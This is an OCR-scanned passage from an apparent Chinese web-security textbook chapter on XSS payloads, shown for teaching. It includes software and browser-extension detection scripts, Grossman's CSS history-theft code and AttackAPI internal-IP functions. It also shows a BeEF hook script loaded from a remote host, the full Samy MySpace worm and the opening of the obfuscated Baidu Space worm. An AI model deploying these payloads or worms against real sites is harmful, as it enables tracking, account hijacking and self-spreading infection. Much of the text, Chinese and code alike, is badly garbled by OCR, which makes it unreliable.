3.2.2.4 ”识别 用 户 安装 的 软件 

EU DRIN UMS 操作 系统 后 ， 进 一 步 可 以 识别 用 户 安 装 的 

次 o 

在 B 可 以 通过 二 判断 ActiveX 控 件 的 clas- sid 是 否 存 在 ， 来 推测 用 户 是 
闭 了 该 软件 。 这 种 方法 很 早 就 被 用 于 “ 挂 马 攻击 ”一 一 黑客 通过 判 

Puce DoE SZ PI DUI, eR d]. RAIA AR SN A 

看 如 下 代码 : 


try ( 

var Obj - ne 

AcEiVexolject(^ XunLeiBHO.ThunderIEHelper'); 
H DEN (e)t 

/ 异常 了 ， 不 存在 该 控件 


这 段 代码 检测 迅 WEB] — 个 控件 (*Xun-LeiBHO. oo e EG 
存在 。 如 采用 户 安装 了 迅雷 软件 ， 则 默认 也 会 安装 此 控件 。 因 此 通过 
判断 此 控件 ， 即 可 推测 用 户 安装 了 迅雷 软件 的 可 能 性 


通过 收集 常见 软件 的 classid， 就 可 以 扫描 出 用 户 电脑 中 安装 的 软件 列 
表 ， 甚 至 包括 软件 的 版 本 。 


— EE 58 = AK TE D RT BEA TE E — 2 i da. > 比如 Flash 有 一 
scapdbliesi $ RE 询 客 户 端 电 脑 中 的 硬件 信息 ; 


acces e 
m 3  — | 
aserinting — — — | — — ] 
ie oe | 
manufacturer 
as es 
serer o 
Eees | — — —] 
sereenResolutiony’ |e | 


Flash 的 System.capabilities 对 象 

TE XSS Payload 中 使 用 时 ， 可 以 在 Fash 的 ActionScript 中 读 取 
system.capabilities 对 象 后 ， 将 结果 通过 ExternalInterface 传 给 页 面 的 
JavaScript。 这 个 过 程 在 此 不 再 班 述 了 

浏 蜗 絮 的 扩展 和 插件 也 能 被 XSS Payload 扫 摘出 来 。 比 如 对 于 Firefox 的 
插件 和 扩展 ， 有 着 不 同 的 检测 方法 。 

Firefox 的 插件 (Plugins) 列表 存放 在 一 个 DOM 对 象 中 ， 通 过 查询 DOM 
可 以 遇 历 出 所 有 的 插件 : 


net versinn 


E d wm css Wæ  DOXv | MH Events Cookies 


=) navigator Navigator [ constructor=Havigator, more.. } 
get appCodeName “Yozilla” 
get appName "Netscape" 
get appVersion "5.0 (Rindows; zh-CN)“ 
get buildID “20100713130626" 
get cookieEnabled true 
get geolocation GeoGeolocation [ constructor=GeoGeolocation } 
get language "zh-CN" 
由 get mimeTypes MimeTrpeàrray { O=MimeType, more... } 
get onLine true 
get oscpu “Rindows NT 5.1" 
get platform “Rind2" 
= get plugins Pluginarray { 0=Plugin, more... } 
日 0 Plugin { 0=MimeType, more... | 
zo MimeType [ constructor=MimeType, more... } 
get description "getplusplusadobei6241" 
由 get enabledPlugin Plugin { 0-MimeTrpe, more... } 
get suffixes vial 
get type "application/getplusplusadobei6241" 
constructor MimeType [ ] 
get description "getplusplusadobei6241" 
get filename np gp. dll" 
get length 1 
get name "getPlusPlus for Adobe 16241" 


^1.6.2.41" 


Firefox 的 plugins 对 象 

所 以 直接 查询 “navigator.plugins” 对 象 ， 就 能 找到 所 有 的 插件 了 。 在 上 图 
中 所 示 的 插件 是 “navigator.plugins[0]”。 

而 Firefox 的 扩展 (Extension) 要 复杂 一 些 。 有 安全 研究 者 想 出 了 一 
方法 : 通过 检测 扩展 的 图 标 ， 来 判断 某 个 特定 的 扩展 是 否 存在 。 

在 Firefox 中 有 一 个 特殊 的 协议 : chrome:/，Firefox 的 扩展 图 标 可 以 通过 
这 个 协议 被 访问 到 。 FGATElash Got 扩 展 的 图 标 ， 可 以 这 样 访问 : 

扫描 Firefox 扩 展 时 ， 只 需 在 JavaScript 中 加 载 这 张 图 片 ， 如 果 加 载 成 
功 ， 则 扩展 存在 ;， 反 之， 扩展 不 存在 。 


var m = new Image( ); 
m.onload = function() { 
alert(1); 
// 图 片 存在 


Fi 

m.onerror = function() { 
alert(2); 

EA 存在 


.Src = , chrome: //flashgot/skin/ 
icon32.png"; ”// 连 接 图 片 


3.2.2.5 CSS History Hack 

我 们 再 看 看 另外 一 个 有 趣 的 XSS Payload 
户 曾经 访问 过 的 网 站 。 

这 个 技巧 最 早 被 Jeremiah Grossman 发 现 ， 其 原理 是 利用 style 的 visited 属 
E 经 访问 过 某 个 链接 ， 那 么 这 个 链接 的 颜色 会 变 得 与 
AAD IAN: 


<body> 

<a href=# > 曾经 访问 过 的 </a> 

«a href="notexist" > 未 曾 访问 过 的 </a> 
</body> 


浏览 器 会 将 点 击 过 的 链接 示 以 不 同 的 颜色 : 


曾经 访问 过 的 未 曾 访问 过 的 
安全 人 研究 者 Rsnake 公 布 了 一 个 POC， 其 效果 如 下 : 


CSS History Hack 


Ongnally found here but permanantly hosted on ha.ckers.org with Jeremiah s permission. 


通过 CSS， 来 发 现 一 个 用 


Fa.ckers.org home || Jeremiah's blog 


Firefox Only! (1.5 - 2.0) tested on WinXP. 
Visited 


© http://mail yahoo.com! 
© htto:/www.google.com! 


Not Visited 


® http//ha ckers. org/blog/ 

e http:/login yahoo. com/ 

 http//mall google. com/ 

e http://my. yahoo. com/ 

e http//sla ckers. orgiforum/ 

e http://slashdot. org/ 

© http://www. amazon.com 

© http://www.aol com’ 

© http://www. apple. com! 

© http//www. bankofamentca. com! 
Rsnake 演 示 的 攻击 效果 


红色 标记 的 ， 殊 是 用 户 曾经 访问 过 的 网 站 ( 即 Visited 下 的 两 个 网 站 ) 。 


这 个 POC 代 码 如 下 : 


<script> 
chee 
/* 
NAME: JavaScript History Thief 
AUTHOR: Jeremiah Grossman 
BSD LICENSE: 
Copyright (c) 2006, WhiteHat Security, Inc. 
All rights reserved. 
Redistribution and use in source and binary 
forms, with or without 
modification, are permitted provided that 
the following conditions are met: 
* Redistributions of source code must retain 
the above copyright notice, 
this list of conditions and the following 
disclaimer. 
* Redistributions in binary form must 
reproduce the above copyright notice, 
this list of conditions and the following 
disclaimer in the documentation 
and/or other materials provided with the 
distribution. 
* Neither the name of the WhiteHat Security 
nor the names of its contributors 
may be used to endorse or promote products 
derived from this software 
without specific prior written permission. 
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT 
HOLDERS AND CONTRIBUTORS "AS IS" 
AND ANY EXPRESS OR IMPLIED WARRANTIES, 
INCLUDING, BUT NOT LIMITED TO, THE 
IMPLIED WARRANTIES OF MERCHANTABILITY AND 
FITNESS FOR A PARTICULAR PURPOSE 
ARE DISCLAIMED. IN NO EVENT SHALL THE 
COPYRIGHT OWNER OR CONTRIBUTORS BE 
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, 
SPECIAL, EXEMPLARY, OR 
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT 
LIMITED TO, PROCUREMENT OF 
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 
DATA, OR PROFITS; OR BUSINESS 
INTERRUPTION) HOWEVER CAUSED AND ON ANY 
THEORY OF LIABILITY, WHETHER IN 
CONTRACT, STRICT LIABILITY, OR TORT 
(INCLUDING NEGLIGENCE OR OTHERWISE) 
ARISING IN ANY WAY OUT OF THE USE OF THIS 
SOFTWARE, EVEN IF ADVISED OF 
THE POSSIBILITY OF SUCH DAMAGE. 
by A 
/* A short list of websites to loop through 
checking to see if the victim has been there. 
Without noticable performance overhead, 
testing couple of a couple thousand URL's is 
possible within a few seconds. */ 
var websites = [ 
"http://ha.ckers.org/blog/", 
"http://login.yahoo.com/", 
"http://mail.google.com/", 
"http://mail.yahoo.com/", 
"http://my.yahoo.com/", 
"http://sla.ckers.org/forum/" 
"http://slashdot.org/", 
"http: //www.amazon.com/", 
"http://www.aol.com/", 
"http: //www.apple.com/" 
"http: //www.bankofamerica.com/", 
"http: //www.bankone.com/", 
"http: //www.blackhat.com/", 
"http://www. blogger .com/", 
"http: //www.bofa.com/", 
"http: //www.capitalone.com/", 
"http: //www.cgisecurity.com/" 
"http://www. chase .com/" 
"http://www.citibank.com/", 
"http://www.cnn.com/", 
"http: //www.comerica.com/", 
"http: //www.e-gold.com/", 
"http: //www.ebay.com/", 
"http: //www.etrade.com/", 
"http://www. flickr.com/", 
"http: //www.google.com/", 
"http: //www.hsbc.com/", 
"http://www.icq.com/", 
"http://www. live.com/", 
"http: //www.microsoft.com/", 
"https://commerce.blackhat.com/", 


/* Loop through each URL */ 

for (var i = 0; i « websites.length; i++) { 
/* create the new anchor tag with the 
appropriate URL information */ 

var link = document.createElement("a"); 
link.id = "id" + i; 


link.href - websites[i]; 

link.innerHTML - websites[i]; 

/* create a custom style tag for the 
specific link. Set the CSS visited selector 
toa 


known value, in this case red */ 
document.write('«style»') 
document.write('#id' + i + ":visited 
(color: &FF0000; i» Js 

document. write(' </style>'); 

/* quickly add and remove the link from the 
DOM with enough time to save the visible 
computed color. */ 

document. body. appendChild(link); 

var color - 
document .defaultView. Me TR FP SUE ISE nu 
11).getPropertyValue("colo ; 

document . body. removeChild(Link); 

/* check to see if the link has been 
visited if the | iud color is red */ 

if (color == "rgb(255, 0, 0)") { // visited 

/* add the link to the visited list * 

var item - document.createElement('li'); 

item.appendChild(link); 

document.getElementById('visited').appendChi 
ld(item); 

} else ( // not visited 

/* add the link to the not visited list */ 

var item - document.createElement('li'); 

item.appendChild(link); 
document.getElementById('notvisited').append 

Child(item); 

} // end visited color check if 
} // end URL loop 
// --> 


</script> 


但 是 Firefox 在 2010 年 3 月 底 决 定 修补 这 个 问题 ， 因 此 ， 未 来 这 种 信息 泄 
露 的 问题 可 能 在 Mozilla 浏 览 喜 中 不 会 再 继续 存在 了 。 


3.2.2.6 ”获取 用 户 的 真实 IP 地 址 

通过 XSS Payload 还 有 办 ee MAAN HIPH HE e 

很 多 时 候 ， 用 户 电 脑 使 用 了 代理 服务 器 ， 或 者 在 局 域 网 中 隐藏 在 NAT 
后 面 。 网 站 看 到 的 客户 端 了 地址 ， 是 内 网 的 出 口 IP 地 址 ， 而 并 非 用 户 电 
脑 真实 的 本 地 IP 地 址 。 如 何 才 能 知道 用 户 的 本 地 IP 地 址 呢 ? 
JavaScript 本 里 并 没有 提供 获取 本 地 IP 地 址 的 能 力 ， 有 没有 其 他 办 法 ? 
一 般 来 说 ，XSS 攻 击 需 要 借助 第 三 方 软件 来 完成 。 比 如 ， 客 户 端 安装 了 
Java 环 境 (JRE) ， 那 么 XSS 就 可 以 通过 调用 JavaApplet 的 接口 获取 客户 
端的 本 地 IP 地 址 。 

在 XSS 攻 击 框架 “Attack API* 中 ， 就 有 一 个 获取 本 地 IP 地 址 的 API: 


/** 
* @cat DOM 
* Qname AttackAPI.dom.getInternalIP 
* Qdesc get internal IP address 
* Qreturn (String) IP address 
* 


AttackAPI.dom.getInternalIP = function () { 
try { 


var sock - new 
java.net.Socket(); 

sock.bind(new 
java.net.InetSocketAddress('0.0.0.0', 0)); 

sock.connect(new 
java.net.InetSocketAddress(document.domain, 
(!document.location.port)? 
80:document.location.port)); 


n 
sock.getLocalAddress().getHostAddress(); 
3 


} catch (e) { 
return '127.0.0.1'; 


此 外 ， 还 有 两 个 利用 Java 获 取 本 地 网 络 信息 的 API: 


/** 
* @cat DOM 
* Qname AttackAPI.dom.getInternalHostname 
* Qdesc get internal hostname 
* Qreturn {String} hostname 
ty 


AttackAPI.dom.getInternalHostname = function 


try { 
var sock = new 
java.net.Socket(); 
sock.bind(new 
java.net.InetSocketAddress('0.0.0.0', 0)); 
sock.connect(new 
java.net.InetSocketAddress(document.domain, 
(!document.location.port)? 
80:document.location.port)); 
return 
sock.getLocalAddress().getHostName(); 
) catch (e) {} 
return 'localhost'; 
J; 
yee 
* @cat DOM 
* Qname AttackAPI.dom.getInternalNetworkInfo 
* Qdesc get the internal network information 
* Qreturn {Object} network information 
object 
x7 


AttackAPI.dom.getInternalNetworkInfo = 
function () { 
var info - (hostname: 'localhost', 
IP: '127.0.0.1'}; 
try { 
var sock - new 
java.net.Socket(); 
sock.bind(new 
java.net.InetSocketAddress('0.0.0.0', 0)); 
sock.connect (new 
java.net .InetSocketAddress(document .domain, 
(!document.location. port)? 
Sordocument Sore OE EHE 
info. = 
sock. 人 ei: Ete A 
info.hostname = 
sock.getLocalAddress().getHostName(); 
) catch (e) {} 
return info; 


— 要 攻击 者 写 一 个 Java Class, BA $1 25 gil ULTRI P. 9 除了 Java 
之 外 ， 一 些 ActiveX 控 件 可 能 也 会 提供 接口 查询 本 地 了 了 地址 。 这 些 功能 
比较 特殊 ， SRR AERO LRAT, AER T o 

Metasploit 引 警 曾 展示 过 一 个 强大 的 测试 页 面 ， 综 合 合 T Java Applet ^ 
Flash ` iTunes ^ OfficeWord ^ QuickTime 448 — Jj ft 的 功能 ， 抓 取 用 
户 的 本 地 信息 ， 有 兴趣 深入 研究 的 读者 可 以 参考 。 


3.23 XSS 攻击 平台 

XSS Payload 如 此 强大 ， 为 了 使 用 方便 ， 有 安全 研究 者 将 许多 功能 封装 
起 来 ， 成 为 XSS 攻 击 平 台 。 这 些 攻击 平台 的 主要 目的 是 为 了 演示 XSS 的 
危害 ， 以 及 方便 渗透 测试 使 用 。 下 面 就 介绍 几 个 常见 的 XSS 攻 击 平台 。 
Attack API 

Attack API 是 安全 人 研究 者 pdp 所 主导 的 一 个 项 目 ， 它 总 结 了 很 多 能 够 直 
接 使 用 XSS Payload， 归 纳 为 API 的 方式 。 比如 上 节 提 到 的 “获取 客户 端 
本 地 信息 的 API”* 就 出 自 这 个 项 目 。 

BeEF 

BeEF 曾 经 是 最 好 的 XSS 演 示 平 台 。 不 同 于 Attack API，BeEF 所 演示 的 


是 一 个 完整 的 XSS 攻 击 过 程 。BeEF 有 一 个 控制 后 台 ， 攻 击 者 可 以 在 后 
台 控 制 前 端的 一 切 。 


L| e Jk http/ /ww bindshellnet/beefjui/e cocmge | 


View Zombies Standard Modules Browser Modules Network Modules Options Help Wade Alcorn (http:/ /www.bindshell.neti 


Browser Exploitation 


"— € 10.0.0.10 


Ww Details 
Browser 
Be EF Chrome 3.0.195.21 


Operating System 
Windows NT 5.1 


Log Summary 


Zombie connected Safar) 511,9 - tote! Mac O5 X 
1051 


Autorun 
Disabled 


Zombies 
&K 10.0.06 
$Ç 100.06 
6 @ 10.0.0.10 
Èd 10004 
@B 10.0.0.10 
€ B 10.0.0.10 


Screen 

1440x754 with 32-bit colour 

URL 

http://10.0.0.6/beef /hook/example.php 

Cookie 
BeEFSession«a042a1c1741d38ee3c701f1c026d2245 


Page Content 
Content 


«img src="../images/beef.gif alt» "BeEF"» BeEF Test Page«br» <br> 


«script language - "Javascript" 
srcz"http://10.0.0.6/beef/ hook /beefmagic.js.php"» « /script» 


The following code needs to be included in the zombie: «br» 
«code» 
Git;script language Javascript 


src«"http://10.0.0.6/beef/hook/beefmagic.js.php'&gt;&t; / script&gt; 


</code> 
<br> 


Key Logger 
Keys 


BeFF 的 后 台 界 面 


ut Result 
Tor is NOT being wied 


Modus code vent 
Module Result 
ugin 
java Embedding Plugin 0.9.7.1 
QuickTime log-in 764 
Shockwave Fast 
Fi p4Mac Windows Maia Plugin 222 
(PhatoPhotocast 
Module code sent 


Modu res 


Zombie connected: Firefox 3.0.14 - Unux #86 


Zombie connected Safari 531.9 - imal Mac OS X 
1058 


Zombie connected: firefox 3.5.3 ~ Intel Mac OS X 105 


Zombie connected: Internet Explorer 4.0 - Windows NT 
$1 


Zombie connected Firefox 3.0.10 - Windows NT $1 


Zombie connected Crome 3.0,195.2] - Windows NT 
$1 


每 个 被 XSS 攻 击 的 用 户 都 将 出 现在 后 台 ， 后 台 挖 制 者 可 以 控制 这 些 浏览 
器 的 行为 ， 并 可 以 通过 XSS 向 这 些 用 户 发 送 命令 。 
XSS-Proxy 
XSS-Proxyzé — T $$ E 级 的 XSS 攻 而 平台 ， 通 过 骸 套 iframe 的 方式 可 以 
实时 地 远程 控制 被 XSS 攻 击 的 浏览 

XSS Sitel Server 


Victim Browser 


XSS against site 


Script commands run here 


IFRAMEI 


Sitel documents 


loaded into here 


"Channel -set to 
other site with info in 


Site2 documents 

Loaded into here a^ 
XSS-Proxy 的 实现 原理 
这 些 XSS 攻 击 平 台 有 助 于 深入 理解 XSS 的 原理 和 和 危害。 


Attacker System 


XSS Sitel Server 


3.2.4 终极 武器 : XSS Worm 

XSS 也 能 形成 蠕虫 吗 ? 我 们 知道 ， 以 往 的 蠕虫 是 利用 服务 器 端 软 件 漏 洞 

进行 传播 的 。 比 如 2003 年 的 冲击 波 蠕 虫 ， 利 用 的 是 windows 的 RPC 远 程 

溢出 漏洞 。 

3.2.4.1 Samy Worm 

1E20054£E£ , 4E[X19 7 HY) Samy Kamkar 发 起 了 对 MySpace.com 的 XSS 

Worm 攻 击 。 qu E de 就 感染 了 100 万 用 户 

一 一 它 在 每 个 用 户 的 目 我 和 洽 介 后 边 2 加 了 一 句 话 : “but most of all, Samy 

is my hero." (Samy 是 我 的 偶像 ) 。 这 是 Web 安 全 史上 第 一 个 重量 级 的 

XSSWorm， 具 有 里 程 碑 意义 。 

今天 我 们 看 看 当时 的 Samy 蠕 虫 都 做 了 些 什 么 ? 

首先 ，MySpace 过 滤 了 很 多 危险 的 HTML 标 签 ， 只 保留 了 <a> 标 签 

<img> 标 签 ` <div> PRSE FF 全 的 标签 ”。 所 有 的 事件 比如 conclicle 等 也 

做 过 小 了 。 但 是 MySpace 却 允许 用 户 控 制 标 签 的 style 属 性 ， 通 过 style， 
还 是 有 办 法 构造 出 XSS 的 。 比 如 : 


<div 
poter backround; oT Javascript elente)): 


其 次 ， MySpace s] fii is J “javascript” 、 “onreadystatechange” 55 HUR 
词 所 以 Samy 用 了 “ 拆 分 法 ” 绕 过 这 些 限制 。 


最 后 ， quc duis sin 完成 了 在 用 户 的 heros 列 表 里 
添加 目 己 名 字 的 功能 ， 同 时 复制 蠕虫 上 自身 进行 传播 。 人 至 此 ,，XSS Worm 
WILK T° Gem ES UM D M 

下 面 附 上 Samy Worm 的 源 代 码 。 这 是 具有 里 程 牧 意 义 的 第 一 个 XSS 
Worm， 原 本 的 代码 压缩 在 一 行内 。 NR. 如 下 代码 已 经 经 过 
了 整理 和 美化 。 


«div id=mycode style="BACKGROUND: 
url('javascript:eval(document.all.mycode.expr 


expr="var B-String.fromCharCode(34); 
var A-String.fromCharCode(39); 
function g(){ 

var C; 

try{ 


var 
D=document .body.createTextRange(); 
C=D. htmlText 
}catch(e){ 


eturn 
eval('document.body.inne'-*'rHTML') 
} 


l 

function getData(AU) { 
M=getFromURL(AU, 'friendID'); 
L=getFromURL(AU, 'Mytoken' ) 


function getQueryParams(){ 
var E=document.location.search; 
var 


F-E.substring(1,E.length).split('&'); 
var AS-new Array(); 
for(var 0=0;0<F.length;0++){ 
var I-F[0].split('-'); 
AS[I[0]]=I[1]}return AS 


var J; 
var AS=getQueryParams(); 
var L-AS['Mytoken']; 
var M-AS['friendID']; 
if (location.hostname=='profile.myspace.com'){ 
document. location='http://www.myspace.com'+lo 
cation.pathname+location.search 
jelse( 
if(!M)( 
S getbata(g()) 


main() 


} 
function getClientFID(){ 
return 
findIn(g(),'up launchIC( '+A,A) 
} 


function nothing(){} 
function paramsToString(AV){ 
var N=new String(); 
var 0-0; 
for(var P in AV){ 
if (0>0){ 
N+='&' 


var Q=escape(AV[P]); 
while(Q.indexof('+')!=-1){ 
Q-Q.replace('-*', '%2B') 


while(Q.indexOf('&')!--1)( 
Q-Q.replace('&', '%26') 

} 

N+=P+'='+Q; 

O++ 


} 


return N 


function httpSend(BH, BI, BJ, BK) { 
if(!J)( 
return false 


eval('J.onr'*'eadystatechange-BI'); 
J.open(BJ, BH, true); 
if(BJ--'POST')( 
J.setRequestHeader('Content- 
Type','application/x-www-form-urlencoded'); 
J.setRequestHeader('Content- 
Length',BK.length) 


J.send(BK); 
return true 
} 
function findIn(BF,BB,BC){ 
var R-BF.indexOf(BB)*BB.length; 
var S=BF.substring(R,R+1024) ; 
return S.substring(0,S.indexOf (BC) ) 
} 
function getHiddenParameter(BF,BG)( 
return findIn(BF, 'name='+B+BG+B+' 
value='+B,B) 


} 
function getFromURL (BF, BG) { 
var T; 
if(BG--'Mytoken')( 
T-B 
jelset 
T-'&! 
} 


var U=BG+'='; 
var V=BF.indexOf(U)+U. length; 
var W=BF.substring(V,V+1024) ; 
var X-W.indexOf(T); 
var Y=W.substring(0,X); 
return Y 
T 
function getXMLObj()1( 
var Z-false; 
if (window. XMLHttpRequest) { 
try{ 
Z=new XMLHttpRequest() 
}catch(e){ 
Z-false 
3 


jelse if (window.ActivexObject){ 
try{ 
Z=new 
ActivexObject('Msxm12.XMLHTTP ' ) 
}catch(e){ 


try{ 
Z=new 
ActiveXObject('Microsoft.XMLHTTP') 
}catch(e){ 
Z=false 
} 
3 
} 
return Z 
} 
var AA=9(); 
var AB=AA.indexOf('m'+'ycode'); 
var AC=AA.substring(AB, AB+4096) ; 
var AD=AC.indexOf('D'+'IV'); 
var AE-AC.substring(0,AD); 
var AF; 
if (AE) { 
AE=AE.replace('jav't'a',A+'jav't'a'); 


AE=AE.replace('exp'+'r)', 'exp'+'r)'+A); 
AF=' but most of all, samy is my 
hero. «d'*'iv id='+AE+'D'+'Iv>' 
F 
var AG; 
function getHome(){ 
if(J.readyState!=4){ 
return 


var AU=J.responseText; 
AG-findIn(AU, 'P'+'rofileHeroes', '</ 
td>'); 
AG-AG.substring(61,AG.length); 
if(AG.indexOf('samy')---1)( 
if(AF)( 
AG+=AF; 
var AR=getFromURL(AU, 'Mytoken'); 
var AS=new Array(); 
AS['interestLabel']-'heroes'; 
AS['submit']-'Preview'; 
AS['interest']-A6; 
J=getXMLObj(); 
httpSend('/index.cfm? 
fuseaction=profile.previewInterests&Mytoken=' 
+AR, postHero, 
'POST',paramsToString(AS)) 
3 


} 
l 


function postHero(){ 
if(J.readyState!=4){ 
return 


var AU-J.responseText; 

var AR=getFromURL(AU, 'Mytoken'); 
var AS=new Array(); 
AS['interestLabel']='heroes'; 
AS['submit ']='Submit'; 
AS['interest']-A6; 


AS['hash']-getHiddenParameter(AU, 'hash'); 
httpSend('/index.cfm? 
fuseaction=profile.processInterests&Mytoken=' 
+AR, nothing, 
'POST',paramsToString(AS)) 
} 
function main(){ 
var AN-getClientFID(); 
var BH-'/index.cfm? 
fuseaction=user .viewProfile&friendID='+AN 
+'&Mytoken='+L; 
J=getXMLObj(); 
httpSend(BH, getHome, 'GET'); 
xmlhttp2=getXMLObj(); 
httpSend2('/index.cfm? 
fuseaction=invite.addfriend_verify&friendID=1 
1851658& 
Mytoken=' +L,processxForm, 'GET') 


function processxForm(){ 
if (xmlhttp2.readyState!=4) { 
return 
} 
var AU=xmlhttp2.responseText; 
var 
AQ=getHiddenParameter(AU, 'hashcode'); 
var AR=getFromURL(AU, 'Mytoken'); 
var AS=new Array(); 
AS['hashcode' ]=AQ 
AS['friendID']-'11851658'; 
AS['submit']-'Add to Friends'; 
httpSend2( '/index.cfm? 
fuseaction-invite.addFriendsProcess&Mytoken-' 
*AR, nothing, 


'POST',paramsToString(AS)) 


function httpSend2(BH, BI,BJ,BK){ 
if(!xmlhttp2) { 
return false 


eval('xmlhttp2.onr'+'eadystatechange=BI'); 
xmlhttp2.open(BJ, BH, true); 
if (BJ=='POST') { 
xmlhttp2.setRequestHeader ( 'Content - 
Type','application/x-www-form-urlencoded'); 
xmlhttp2.setRequestHeader('Content-Length',BK.length)) 
xmlhttp2.send(BK); 
return true 
}"></DIV> 


XSS Worm 是 XSS 的 一 种 终极 利用 方式 ， 它 的 破坏 力 和 影响 力 是 巨大 
的 。 但 是 发 起 XSS Worm 攻 击 也 有 一 定 的 条 件 。 

一 般 来 说 ， 用 户 之 间 发 生 交 互 行为 的 页 面 ， 如 果 存 在 存储 型 XSS， 则 比 
较 容 易 发 起 XSS Worm i © 

比如 ， 发 送 站 内 信 、 用 户 留 言 等 页 面 ， 都 是 XSS Worm 的 高 发 区 ， 需 
重点 关注 。 而 相对 的 ， 如 果 一 个 页 面 只 能 由 用 户 个 人 查看 ， 比 如 “用 户 
个 人 资料 设置 > 页面 ， 因 为 缺乏 用 户 之 间 互 动 的 功能 ， 所 以 即使 存在 
XSS， 也 不 能 被 用 于 XSS Worm 的 传播 。 

3.2.4.2 AZERE 

下 面 这 个 XSS Worm 的 案例 来 自 百度 。 

2007 年 12 月 ， 百 度 空 间 的 用 户 急 然 互相 之 间 开 始 转 发 垃圾 短 消息 ， 后 
来 百度 工程 师 紧 急 修复 了 这 一 漏洞 : 


HELE 
EA HR REE! — 
29 

亲爱 的 He 

ROWE MBAS, ru, SRIGRARRID. OMEP BABIN, 并且， 在 消息 之 后 队 有 该 消息 人 的 宣 间 地址， 网 请 加 点 击 该 
ht, URBE OHNE UR) ， 
RW 
RSMAS, RITE, KKBATSSHOAAURNS, Jt BIRD DDR PIU R2 s eri 


但 由 于 则 时 发 送 大 量 消 息 会 二 用 系统 资源 ， 可 能 会 使 得 您 的 机 器 训 度 变 慢 ， 如 果 你 访问 过 前 面 所 说 的 空间 网 址 ， 并 且 有 机 器 变异 的 迹象 ， 退 出 空间 登录 状态 
piene 但 当 您 再 次 登陆 后 ， 依 然 有 可 能 面临 同样 的 问题 ， 彻 区 摆脱 恶意 代码 ， 只 需 在 百度 宝 间 的 模板 页 面 《httpyihi.baidu.com/sys/share) 重新 换 
模板 即 可 ， 


eae 我 们 对 消息 的 发 送 进行 了 控制 ， 并 正在 消除 受 感 染 的 用 户 模板 中 的 亚当 代码， 当 问题 得 到 完全 解决 ， 我 们 会 在 第 一 时 间 通 


es MND Hier RK. HOMERS, VEHier 8 7 EID ROSE 0 


UPDATE: £51 TARE AES, ACM! 
R-BRAFA XHedTiB£e, BE. GEAMLAM, $908! 


如 果 有 什么 问题 欢迎 反馈 给 我 们 ， 


ABE 
也 在 百度 空间 吧 内 反馈 你 的 问题 
C 在 本 文章 下 留守 


BED L 


AHEZA AH 

这 次 事件 ， 是 由 XSS Worm 造 成 的 。 时 任 百 度 系 统 部 高 级 安全 顾问 的 方 
小 顿 ， 分 析 了 这 个 蠕虫 的 技术 细节 ， 他 在 文中 写 到 : 上 面 基 本 就 是 代 
码 ， 总 体 来 说 ， 还 是 很 有 意思 的 。 首 先 就 是 漏洞 ， 过 滤 多 一 个 字符 都 


不 行 ， 甚 至 挪 一 个 位 置 都 不 行 (上 面 的 Playload 部 分 ) 。 这 个 虫子 比较 
特殊 的 地 方 是 感染 正 用 户 ， 对 其 他 用 户 无 影响 ， 另 外 就 是 完全 可 以 隐 
蔽 地 传播 ， 因 为 只 是 在 CSS 中 加 代码 并 不 会 有 什么 明显 的 地 方 ， 唯 一 的 
缺陷 是 有 点 卡 。 所 以 ， 完 全 可 以 长 时 间 地 存在 ， 感 染 面 不 限制 于 blog,， 
存在 CSS 的 地 方 都 可 以 ， 壁 如 Profile。 另 外 比较 强大 的 一 点 就 是 跟 真 

的 虫子 一 样 ， 不 只 是 被 动 地 等 待 ， 选 择 在 好 友 发 消息 时 引诱 别人 过 来 
访问 自己 的 blog， 利 用 好 奇 心 可 以 做 到 这 点 。 最 后 还 加 了 个 给 在 线 人 随 
机 发 消息 请 求 加 链接 ， 威 力 可 能 更 大 ， 因 为 会 创造 比较 大 的 基数 ， 这 
样 一 感染 就 是 一 个 blog。 到 Baidu 封 锁 时 ， 这 个 虫子 已 经 感染 了 8700 多 
个 blog。 总 体 来 说 还 不 错 ， 本 来 想 作为 元 旦 的 一 个 贺礼 ， 不 过 还 是 提前 
死 掉 了 。 可 以 看 到 ， 在 代码 和 流程 里 运用 了 很 多 系统 本 身 就 有 的 特 
Tk, Bed o 

这 个 百度 XSS Worm 的 源 代码 如 下 : 


window.onerror = killErrors; 

execScript (unescape( 'Function%2QURLEncoding 
%28vstrIN%29%0A%20%20%20%20strReturn%20%3D 
%20%22%22%0A%20%20%20%20FOr%20aaaa%20%3D 
%201%20T0O%20LeEnN%28vstr1n%29%0A%20%20%20%20%20 
962096209620 ThisChr?620963D9620Mid9628vStrIn?62Caaaa 
762C19629960A962 0962 0762 09620262 0962 0962 02620 I F%20AD 
S%28ASC%28THISChr%29%29%20%3C%20%26HFF%20Then 
%OA%20%20%20%20%20%20%20%20%20%20%20%20S 
trReturn%20%3D%20strReturn%20%26%20ThisChr%0A 
%20%20%20%20%20%20%20%20E1Se%0A%20%20%20 
%20%20%20%20%20%20%20%20%20innerCode%20%3D 
%2OASC%28THISChr%29%0A%20%20%20%20%20%20%20 
%20%20%20%20%201 F%20innerCode%20%3C 
%200%20Then%0A 
%20%20%20%20%20%20%20%20%20%20%20%20 
%20%20%20%20innerCode%20%3D%20innerCode%20+ 
%20%26H10000%0A%20%20%20%20%20%20%20%20%20 
%20%20%20End%20If%OA 
%20%20%20%20%20%20%20%20%20%20%20%20Hight8%20 
%3D%20%28innerCode%2 
0%20ANd%20%26HFFO0%29%5C%20%26HFF%OA 
%20%20%20%20%20%20%20%20%20%20%20%20LOW8%20%3 
D%20 

innerCode%20And%20%26HFF%OA 
%20%20%20%20%20%20%20%20%20%20%20%20strReturn 
%20%3D%20strR 
eturn%20%26%20%22%25%22%20%26%20HEX 
%2BHIght8%29%20%26%20%20%22%25%22%20%26%20HEX 
%28Lo 
w8962 9960962 0762 0762 9962 0962 0?62 02620962 OE n d?620 I f 960A 
762076209?6209620N ex t?604?620?6209?62 09622 OURLEncoding 
%20%3D%20strReturn%OAEnd 
%20Function'), 'VBScript'); 

cookie=''; 

cookieval=document .cookie; 

spaceid-spaceurl; 
myhibaidu="http://hi.baidu.com"+spaceid; 
xmlhttp=poster(); 

debug=0; 

online(); 

if(spaceid!='/') ( 

if(debug==1) { 

goteditcss(); 

document .cookie='xssshell/owned/you!'; 

} 

if (cookieval.indexOf('xssshell')==-1) { 
goteditcss(); 

document .cookie='xssshell/owned/you! '; 

} 

} 

function makeevilcss(spaceid, editurl, use) { 
